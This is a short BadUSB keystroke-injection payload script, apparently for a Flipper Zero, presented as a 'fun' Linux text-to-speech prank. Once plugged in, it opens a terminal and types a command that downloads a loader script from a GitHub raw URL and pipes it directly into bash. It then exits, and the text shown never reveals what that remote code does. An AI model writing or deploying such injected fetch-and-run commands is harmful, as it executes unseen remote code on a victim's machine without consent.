REM ============================================================
REM 🔊 Text to Speech - Linux
REM ============================================================
REM Author: dil1thium
REM Version: 3.0 (Modular)
REM Target: Linux (requires espeak/festival)
REM Category: Fun
REM
REM Makes the computer speak.
REM
REM OPTIONAL:
REM   Set MSG for custom message
REM ============================================================
DELAY 500
CTRL ALT t
DELAY 1500
STRING MSG="Hello, I have taken control of your computer" M="tts" bash -c 'curl -sL https://raw.githubusercontent.com/reschjonas/FlipperZero_BadUSB/main/remote-payloads/loaders/loader.sh|bash'
ENTER
DELAY 500
STRING exit
ENTER
